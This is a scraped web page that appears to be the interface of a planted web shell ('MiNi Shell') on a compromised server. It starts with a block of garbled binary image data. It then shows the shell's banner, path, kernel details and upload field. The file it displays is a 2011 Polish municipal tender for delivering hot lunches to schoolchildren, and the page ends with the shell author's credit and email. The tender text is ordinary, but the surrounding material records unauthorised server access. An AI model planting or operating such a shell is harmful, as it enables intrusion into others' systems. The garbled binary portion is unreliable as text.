JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111212/422656-N-2011.html

<p class="kh_header"><b>Kocmyrzów: Świadczenie usługi dostarczania ciepłych posiłków (drugiego dania obiadowego) dla dzieci  wymagających tej formy pomocy do szkół podstawowych i gimnazjum na terenie gminy Kocmyrzów - Luborzyca w roku 2012</b><br>
<b>Numer ogłoszenia: 422656 - 2011; data zamieszczenia: 12.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Kocmyrzowie-Luborzycy , Luborzyca 97, 32-010 Kocmyrzów, woj. małopolskie, tel. 0-12 387 11 10, faks 0-12 387 11 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi dostarczania ciepłych posiłków (drugiego dania obiadowego) dla dzieci  wymagających tej formy pomocy do szkół podstawowych i gimnazjum na terenie gminy Kocmyrzów - Luborzyca w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi dostarczania ciepłych posiłków (drugiego dania obiadowego) dla dzieci  wymagających tej formy pomocy do szkół podstawowych i gimnazjum na terenie gminy Kocmyrzów - Luborzyca w roku 2012.

Zamówienie obejmuje dostarczanie ciepłego posiłku obejmującego drugie danie obiadowe do 12 szkół podstawowych oraz 1 gimnazjum i dla łącznie nie mniej niż 30 a nie więcej niż 60 dzieci, w następujących lokalizacjach: 
Szkoła Podstawowa Czulice, Czulice, 32-010 Luborzyca
Szkoła Podstawowa  Goszcza, Goszcza, 32-010 Luborzyca
Szkoła Podstawowa Goszyce, Goszyce 53,  32-010 Luborzyca
Szkoła Podstawowa Karniów, Karniów 33,  32-010 Luborzyca
Szkoła Podstawowa Kocmyrzów I,  Luborzyca 98, 32-010 Luborzyca
Szkoła Podstawowa Kocmyrzów II,  Kocmyrzów, 32-010 Luborzyca
Szkoła Podstawowa Luborzyca, Luborzyca, 32-010 Luborzyca    
Szkoła Podstawowa Łososkowice, Łososkowice 34,  32-010 Luborzyca
Szkoła Podstawowa Łuczyce, Łuczyce , 32-010 Luborzyca
Szkoła Podstawowa Maciejowice,  Maciejowice, 32-010 Luborzyca
Szkoła Podstawowa Pietrzejowice, Pietrzejowice 52, 32-010 Luborzyca 
Szkoła Podstawowa Prusy , Prusy , 32-010 Luborzyca
Gimnazjum Luborzyca, Wysiołek Luborzycki 160, 32-010 Luborzyca

UWAGA! Zamawiający zastrzega, że liczba posiłków w poszczególnych szkołach może być zmienna. Ostateczna  liczba posiłków zależna będzie od liczby dzieci objętych wsparciem. Ustalenie ostatecznej liczby dzieci w poszczególnych szkołach objętych wsparciem nastąpi najpóźniej na 2 dni przed rozpoczęciem świadczenia usługi przez Wykonawcę. Liczba dzieci objętych wsparciem w trakcie realizacji zamówienia może ulegać zmianie, jednakże minimalna liczba dzieci objętych wsparciem wynosić będzie 30, a maksymalna 60. Zmiana liczby dzieci może ulec zmianie również od 3.09 2011  (nowy rok szkolny). 

Maksymalna liczba dni świadczenia usług w trakcie realizacji umowy to 187. Posiłki będą dostarczane od poniedziałku do piątku, z wyłączeniem dni wolnych od nauki, niedziel i świąt. W razie konieczności odpracowywania danego dnia szkolnego świadczenie usługi może odbywać się również w sobotę.  W poszczególnych miesiącach rozkład dni przedstawia się następująco (liczba dni maksymalna i może ulec zmniejszeniu w przypadku ustalenia dodatkowych dni wolnych od nauki, przy czym UWAGA! liczba dni świadczenia usługi w poszczególnych szkołach może być różna - w zależności od ustalonych w danej szkole dni wolnych od nauki): Styczeń - 17, Luty - 11 Marzec - 22 Kwiecień - 20 Maj - 20 Czerwiec - 19 Wrzesień - 19 Październik - 23 Listopad - 21 Grudzień - 15. 

Planowana maksymalna ilość posiłków w okresie realizacji zamówienia wynosi 11 220 sztuk (maksymalnie 60 dzieci x maksymalnie 187 dni nauki).

Dyrektor każdej szkoły w której będzie realizowana usługa (lub osoba przez niego upoważniona) z wyprzedzeniem - do godziny 8:30 w danym dniu poinformuje Wykonawcę o ilości dostarczanych posiłków na dany dzień. Dyrektor każdej szkoły w której będzie realizowana usługa (lub osoba przez niego upoważniona), maksymalnie na 2 dni przed rozpoczęciem nowego miesiąca, poinformuje Wykonawcę o liczbie dni świadczenia usługi w danym miesiącu (w zakresie pierwszego miesiąca - na 2 dni przed rozpoczęciem świadczenia usługi). 
Zamawiający zastrzega, że ilość posiłków może ulec zmniejszeniu w przypadku nieobecności danego dziecka objętego wsparciem w szkole. Wykonawca nie może mieć w stosunku do Zamawiającego żadnych roszczeń z powodu realizacji zamówienia w mniejszym zakresie.
Posiłki będą dostarczane i wydawane w godzinach ustalonych z Dyrektorami poszczególnych szkół.
Wykonawca zobowiązany jest dostarczać posiłki terminowo. 
Dostarczone posiłki będą świeże i przyrządzone w dniu dostawy, ze świeżych, posiadających aktualne terminy ważności produktów żywnościowych. Posiłki muszą być urozmaicone (nie mogą się powtarzać w ciągu tygodnia).
Wykonawca zobowiązany jest do zapewnienia na swój koszt i ryzyko właściwego transportu posiłków, zgodnie z obowiązującymi w tym zakresie krajowymi i unijnymi przepisami sanitarnymi.
Wykonawca będzie dostarczał posiłki w naczyniach (opakowaniach) jednorazowego użytku wraz z jednorazowymi sztućcami umożliwiającymi konsumpcję oraz w sposób gwarantujący utrzymanie odpowiedniej temperatury i jakości dostarczanych posiłków. Naczynia (opakowania) oraz jednorazowe sztućce będą wykonane z materiałów przeznaczonych do kontaktu z żywnością zgodnie z obowiązującymi w tym zakresie krajowymi i unijnymi przepisami. 

Do obowiązków Wykonawcy należeć będzie także codzienny odbiór naczyń (opakowań)  i odpadów żywnościowych. Będą one odbierane będą w następnym dniu dostawy posiłków. 

Posiłki powinny być przygotowane i dostarczane zgodnie z obowiązującymi normami i przepisami prawa - w szczególności zgodnie z zasadami określonymi w ustawie o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. nr 171 poz.1225 z późn. zm.) łącznie z przepisami wykonawczymi do tej ustawy oraz zgodnie z przepisami unijnymi regulującymi kwestie żywieniowe. 

Wyklucza się posiłki typu fast food. Bezwzględnie należy przestrzegać norm na składniki pokarmowe i produkty spożywcze określone przez Instytut Żywienia i Żywności. Posiłki mają być przygotowane zgodnie z zasadami racjonalnego żywienia dzieci i młodzieży. 
Przez drugie danie obiadowe rozumie się posiłek zawierający co najmniej ziemniaki, kasze, ryż itp., potrawę mięsną,  dodatki warzywne (sałatki, surówki lub inne tego rodzaju dodatki). Dopuszcza się także dania półmięsne (np. spaghetti, gołąbki etc.) jednakże nie więcej niż 1 raz  w tygodniu. W piątki Wykonawca będzie dostarczał dania jarskie (bezmięsne). 

Każdy posiłek powinien mieć wartość energetyczną wyrażoną w kilokaloriach (kcal) - nie mniejszą niż 500 kcal. Dla posiłku jarskiego (bezmięsnego) dopuszcza się aby  posiłek miał wartość energetyczną wyrażoną w kilokaloriach (kcal) - nie mniejszą niż 350 kcal.

Zamawiający zastrzega sobie prawo do dokonywania kontroli w trakcie wykonywania usługi przez Wykonawcę.

Wykonawca przed rozpoczęciem każdego tygodnia będzie przekazywał Dyrektorom poszczególnych szkół jadłospis tygodniowy. Jadłospis powinien każdorazowo uwzględniać wartość energetyczną poszczególnych posiłków w danym dniu, wartość ta powinna być wyrażona w kilokaloriach (kcal)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania dotychczasowemu wykonawcy usługi zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9, 55.52.31.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował sposobu dokonania oceny spełnienia tego warunku w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu o którym mowa w art. 22 ust 1 pkt 2 ustawy Pzp zostanie uznany za spełniony, gdy Wykonawca wykaże się doświadczeniem w wykonaniu (lub w wykonywaniu - w przypadku świadczeń okresowych lub ciągłych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi, odpowiadającej swoim rodzajem i wartością usłudze, stanowiącej przedmiot zamówienia. Za usługę odpowiadającą swoim rodzajem i wartością usłudze, stanowiącej przedmiot zamówienia uważa się świadczenie usług dostarczania posiłków (catering) o wartości co najmniej 15 000,00 zł brutto,  obejmującą dostarczanie posiłków co najmniej do 2  lokalizacji, dla łącznie minimum 8 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował sposobu dokonania oceny spełnienia tego warunku w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował sposobu dokonania oceny spełnienia tego warunku w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował sposobu dokonania oceny spełnienia tego warunku w niniejszym postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi  wymagań określonych przez zamawiającego - zał. nr 4 do siwz</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadkach:
- zmian przepisów prawnych w tym w szczególności przepisów podatkowych. W przypadku zmiany ustawowej stawki podatku VAT kwota brutto dostarczenia jednego ciepłego posiłku (drugiego dania obiadowego) należna Wykonawcy nie może ulec podwyższeniu, a ewentualna zmiana umowy będzie dotyczyła kwoty podatku i kwoty netto tego wynagrodzenia. 
- zmiany ogólnej liczby dzieci objętych wsparciem - zwiększeniem lub zmniejszeniem liczby dzieci przewidywanych do objęcia wsparciem w zamówieniu (tj. poniżej 30 lub powyżej 60 dzieci). W takim przypadku maksymalna wartość nominalna umowy może ulec odpowiedniej zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/bip; http://www.kocmyrzow-luborzyca.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, 32-010 Kocmyrzów, Luborzyca 97 /bud. U.G./, I piętro, pokój nr 16 b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 11:00, miejsce: Drogą pocztową: Gminny Ośrodek Pomocy Społecznej, 32-010 Kocmyrzów, Luborzyca 97, osobiście lub kurierem: adres j.w. bud. U.G., I piętro, pokój nr 14a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com